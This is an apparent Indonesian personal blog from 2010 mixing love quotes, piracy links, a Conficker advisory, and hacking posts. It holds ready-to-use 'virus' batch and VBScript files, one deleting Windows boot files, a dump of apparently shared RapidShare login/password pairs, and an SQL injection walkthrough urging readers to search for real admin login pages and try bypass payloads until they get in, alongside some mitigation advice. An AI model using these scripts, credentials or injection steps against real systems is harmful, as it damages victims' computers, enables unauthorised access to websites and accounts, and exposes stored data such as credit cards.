(55) Aku akan berhenti mencintaimu, ketika berlian tak lagi berkilau, bunga tak lagi bersemi, petir tak lagi bergemuruh, sungai tak lagi mengalir, bintang tak lagi bersinar, pelangi tak lagi membias. Ah, ngga juga. Kalaupun itu terjadi, aku tak akan berhenti.

(56) Aku nggak menangis karena kehilanganmu, tapi mengetahui kau tak pernah berusaha mencegahku pergi.

(57) Kenapa aku tetap menginginkanmu walau kamu tak pernah punya rasa yang sama. Masalahnya, begitu sulit membuatmu mencintaiku, lebih sulit lagi memaksa hatiku berhenti memikirkanmu.



cukup ywa....
kurang???
langsung beri ajja ntu cewek...
hhiii
by Dwipangga

virus???
sapa takut???
hhehheee...
maksdnya apa nie...
kita tengok skema bikin virus nyok...
mulai dari yang ecek"

virus???
sapa takut???
hhehheee...
maksdnya apa nie...
kita tengok skema bikin virus nyok...
mulai dari yang ecek"

nie hanya sekedar virus yang menggunakan script ajja

Bikin message yang nongol terus-terusan...

@ECHO off
:Begin
msg * -WARNING-
msg * Sorry PC lo kaya'y ngaco....
msg * Udah install ulang aja.....
msg * Biar masalah nya kelar....
msg * Wkwkwkwkwkkkkkkkk....
GOTO BEGIN

save namafile ( .BAT )

- Kejadian yg udah2 biar katA d kill d task manager, masih tetep ja nongol ntu message

Bikin Shutdown trus da Message'y...

@ECHO off
msg * -=WARNING=-
shutdown -s -c "Error !!!"

save namafile ( .BAT )

Maenin Caps Lock...

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

save namafile ( .vbs )

Maenin CD/DVD biar buka tutup mulu...

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

save namafile ( .vbs )

Bikin vbscript nongol mlulu...

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

save namafile ( .vbs )

- Kejadian yg udah2 d task manager jd full wscript yg lg running

Bikin tombol Backspace neken mlulu...

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

save namafile ( .vbs )

Bikin otomatis ngetik "Erorr!!!" di notepad/word...

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Erorr!!!"
loop

save namafile ( .vbs )

Bikin supaya buka notepad mlulu...

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

save namafile ( .BAT )

- Ati2 cz ni script klo mnurut w pling ngeselin bgt....
- Klo mw yg kluar bkn notepad tinggal rubah ja DIR'y....

Bikin supaya setiap buka notepad otomatis ngetik apa yg ente mau...

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "E"
WScript.Sleep 50
WshShell.SendKeys "R"
WScript.Sleep 50
WshShell.SendKeys "O"
WScript.Sleep 50
WshShell.SendKeys "R "
WScript.Sleep 50
WshShell.SendKeys "R "
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!"

save namafile ( .vbs )



Cara shut down selama'a
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

save dengan ekstensi .bat

sekian dulu dweh.....
sebenarnya masih banyak cara bikin virus...
tapi nie awal ajja koQ
hheeee...

by Dwipangga




hhee....
eng ing eng...
yang di tunggu"
download gratis microsoft office 2010
udah tau donk power software kluaran microsoft ini...
yukk mari,...


hhee....
eng ing eng...
yang di tunggu"
microsoft office 2010
udah tau donk power software kluaran microsoft ini...
yukk mari,...

sebenernya banyak fungsional lebih dari ms.office 2010
gw make sich enjoy ajje..
mantab pula
susah di jelasin lewat kata" dah..
dari mulai start up ampe ending w terkesan getooh...
di coba lah...
file kurang lebih 700mb'an...(belom di extract)
jadi cari warnet tercepat yang loe tau buat nyedot nie software

by dwipangga

langsung download(sedotttttttttttt)
disini

Minggu, 21 November 2010

sebenarnya hack fb bisa pa ga ywa????

jawabannya ntu antara bisa dan tidak
kenapa???

sebenarnya hack fb bisa pa ga ywa????

jawabannya ntu antara bisa dan tidak
kenapa???
gini,sbenarnya menurut gw ntu bukan hack,tapi manipulasi data...
bingung???
klo kaya hacker ecek" macem w,kga bakal mungkin bisa ngebobol data server PT.facebook.tbk (hhehhee....maap pak facebook)
tapi bisa di akalin lewat manipulasi data client...
kasih ga ywa triknya. . .
hmmmmmm....
w sih mau kasih triknya,tapi.....
hhehhehee...
ntar w kejaring intel'a facebook lagi. . .
(hhiiiii,maap pak facebook)
sebenernya ada banyak cara buat hack fb,di antaranya lewat pihak ketiga
sempet w nyoba nego ma hacker rusia yang konon memegang lebih dari 1000 account facebookersssss. . .
tapi. . .
super medit,di tambah w kga ngarti bahasa mereka,(walaupun w lewat translator,hhehh)

ada juga trik lewat inject data. . .
tapi w juga kga ngarti sepenuhnya. . .
hhehhe
sorry,bukanya pelit ga ngasih tau triknya. . .
tp sabar,w lg matengin dulu ilmunya. . .
tunggu ajja postingan w yang lanjutan dari hack fb...
ini cuma pengantar ajja kaleee. . .
sabar ya. . .
hhehheee.....
by dwipangga

Jumat, 19 November 2010

Mungkin in yang ditunggu-tunggu oleh para bloger maupun para insan yang bergentayangan didunia internet. Bagi kamu yang udah bosen memakai domain blabla.blogspot.com , yaitu kita bisa mendapatkan domain dot com (namamu.com) secara geratis. Benarkah ini nyata? Benarkah domain dot com bener-bener gratis?

Mungkin in yang ditunggu-tunggu oleh para bloger maupun para insan yang bergentayangan didunia internet. Bagi kamu yang udah bosen memakai domain blabla.blogspot.com , yaitu kita bisa mendapatkan domain dot com (namamu.com) secara geratis. Benarkah ini nyata? Benarkah domain dot com bener-bener gratis? kayaknya sih emang bener-bener nyata dan gratis, soalnya aku sendiri lom nyoba, tapi setelah aku survey di TKP, dan hasilnya... eng..ing..eng.. kalo menurutku sih masuk akal kalo ini bener-bener gratis.

Trus kenapa mereka mau membuatkan domain dot com buat kita? padahal kan domain dot com (top level domain) itu bukan jenis domain gratisan. Gini nih kalo menurut jawabanku, kenapa kita bisa mendapatkan domain dot com gratis karena mereka akan menempatkan iklan/banner di website kita, tapi jangan kuatir bannernya akan ditempatkan dibagian bawah dari web/blog kita. Nha bagaimana? kamu tertarik mau mencobanya? silahkan daftar disini : DOMAIN DOT COM GRATIS. Oh ya ku lupa, ada beberapa persyaratan lagi yang harus dipenuhi, gini nih beberapa persyaratanya :

1. Web/blog harus memiliki postingan minimal 15 perbulan, atau we/blog kamu memiliki pengunjung minimla 100/hari
2. Kamu harus memasang banner mereka di bagian bawah web/blog kamu.
3. Tidak boleh mengandung unsur pornografi.
4. dll

Intinya syaratnya seperti itu. Nah udha nggak sabar ingin mencobanya? silahkan DAFTAR DISINI
F-Secure melaporkan Worm baru seri Downadup. Worn tersebut dapat menginfeksi computer dengan OS Windows Workstation dan Server.
Sejak akhir tahun lalu, banyak laporan dari network perusahaan terkena varian Downadup.

F-Secure melaporkan Worm baru seri Downadup. Worn tersebut dapat menginfeksi computer dengan OS Windows Workstation dan Server.
Sejak akhir tahun lalu, banyak laporan dari network perusahaan terkena varian Downadup.

Downadup dikenal juga dengan nama Conficker adalah jenis worm network. Tidak seperti biasanya worm jenis ini memang sulit dihapus, terlebih bila masuk kedalam jaringan LAN perusahaan.

Untuk mencegah serangan Worm Downadup :

* Gunakan patch Microsoft terbaru.

* Pastikan computer internal perusahaan mengupdate antivirus terbaru.

* Periksa update dari antivirus.

* Matikan AUTORUN dan AUTOPLAY untuk USB

* Pastikan password dengan kerumitan lebih tinggi.


Bila sudah terinfeksi, langkah yang perlu diambil :
Lihat langkah yang perlu diambil dari informasi perusahaan pembuat antivirus.
Larangan mengunakan USB dan matikan trafik yang tidak perlu dari Firewall
Matikan jalur LAN, karena Downadup memang cukup rumit.

Downadup mengunakan beberapa cara penyebaran. Worm Downadup mencari OS yang belum dipatch lalu mencoba menebak pasword dan menginfeksi USB flashdrive.
Masalah yang umum terjadi dari Worm Downadup adalah mengunci user account. Karena Downadup mengunakan cara acak untuk menembus password jaringan.

Ketika Downadup masuk kedalam computer, maka secara agresif Worm ini mempertahankan diri.
Seperti melakuakn restart lebih dahulu, lalu merubah Access Right ke file dan merubah kunci Registry.
Sehingga menghapus Worm Downadup menjadi semakin sulit

Worm Downadup juga mendownload versi modifikasi terbaru sendiri dengan mendownload versi perubahan yang baru.
Nama website juga mengunakan sistem generator sendiri secara alogaritma sesuai jam dan tangal.

Senin, 08 November 2010

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.
 oke,bagi yang boring ngeliat download klo udah di rapid shared.
nie,w bagiin account rpid shared yang premium punya.

tapi w ga tau ini bisa kga,Cz w lebih seneng download di 4shared.
boleh di coba yee...
hhihihihiiii



LOGIN: 31989

PASSWORD: 2310214



LOGIN: 27766

PASSWORD: 8797341



User: 18549

Password: 4646182



Login: 20145

Password: 7072148



Login: 19159

Password: 7932964



Login: 20151

Password: 773290



Login: 20366

Password: 7177185



Login: 20374

Password: 5630758



Login: 20452

Password: 3249043



LOGIN: 20949

PASSWORD: 2716739



User: 22484

Password: 358030



User: 18549

Password: 4646182



User: 18800

Password: 9496722



LOGIN: 20949

PASSWORD: 2716739



Login: 20145

Password: 7072148



Login: 19159

Password: 7932964



Login: 20151

Password: 773290



Login: 20366

Password: 7177185



Login: 20374

Password: 5630758
Login: 20452

Password: 3249043



LOGIN: 20949

PASSWORD: 2716739



User: 22484

Password: 358030



User: 18549

Password: 4646182



User: 18800

Password: 9496722



LOGIN: 20949

PASSWORD: 2716739



Login: 20145

Password: 7072148



Login: 19159

Password: 7932964



Login: 20151

Password: 773290



Login: 20366

Password: 7177185



Login: 20374

Password: 5630758



Login: 20452

Password: 3249043



di icip-icip. . . .

Minggu, 07 November 2010

Penggunaan SQL Injection server target. Bagi maniac hacker, kita semua harus taukan :) pengertian MySQL.... :D
Lansung aja:

1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.

2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Sebab terjadinya SQL Injection

1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.

2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

Bug SQL Injection berbahaya ?

1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.

2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.

3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.


Apa saja yang diperlukan untuk melakukan SQL Injection ?

1) Internet Exploler / Browser

2) PC yang terhubung internet

3) Program atau software seperti softice



Contoh sintaks SQL Injection
Contoh sintak SQL dalam PHP

1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”;, {dari GET atau POST variable }

2) isikan password dengan string ’ or ’’ = ’

3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”;, { dengan SQL ini hasil selection akan selalu TRUE }

4) m aka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL

Gambar contoh SQL Injection


Contoh sintaks SQL Injection

1) Sintaks SQL string ‘-- setelah nama username

2) Query database awal :


Berubah menjadi :




Contoh sintaks SQL Injection

SQL Injection melalui URL, contohnya :


Penanganan SQL Injection

1) Merubah script php

2) Menggunakan MySQL_escape_string

3) Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php

Contoh script php semula :

$query = "select id,name,email,password,type,block from user " .

"where email = '$Email' and password = '$Password'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{

echo "<script>alert('Your account has been blocked');

document.location.href='index.php';</script>n";
exit();
}

else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :

Maka dilakukan perubahan script menjadi :

$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{

echo "<script>alert('Your account has been blocked');

document.location.href='index.php';</script>n";
exit();
}
$pass = md5($Password);

else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));

2. Menggunakan MySQL_escape_string

Merubah string yang mengandung karakter ‘ menjadi ’ misal SQL injec’tion menjadi SQL injec’tion

Contoh : $kar = “SQL injec’tion”;

$filter = mySQL_escape_string($kar);

echo”Hasil filter : $filter”;

Hasilnya :


3. Pemfilteran karakter ‘ dengan memodifikasi php.ini

Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi ’ secara otomatis oleh php
Contoh :


Contoh script yang membatasi karakter yang bisa masukkan :

function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

validatepassword = true
for i = 1 to len( input )

c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection

1) Masuk ke google atau browse yg lain

2) Masukkan salah satu keyword berikut

"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}


3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).

4) Masukkan kode berikut :

User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)

5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.

6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.

7) Banyak variasi kode yang mungkin, antara lain :

User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :

‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;

“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x

8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION

1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.

2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).

3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.

4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.

5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.


Hacking itu seni.... :) dan Hacking jg perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga2nya, yakin deh anda akan berhasil. :)

Sabtu, 06 November 2010

 bagi kalian yang punya CD program tapi mlez buat explorer buat install program
boleh nich usul. . . pke script biar simple
nulisnya  pake notepad yee


[autorun]
OPEN=SETUP.EXE
ICON=SETUP.EXE,0

shell\configure=&Configure...
shell\configure\command=SETUP.EXE   ----->tergantung nama installernya

shell\install=&Install...
shell\install\command=SETUP.EXE   ----->tergantung nama installernya





simpan dengan judul autorun.inf
save as type-nya pake yang all files(JANGAN TXT)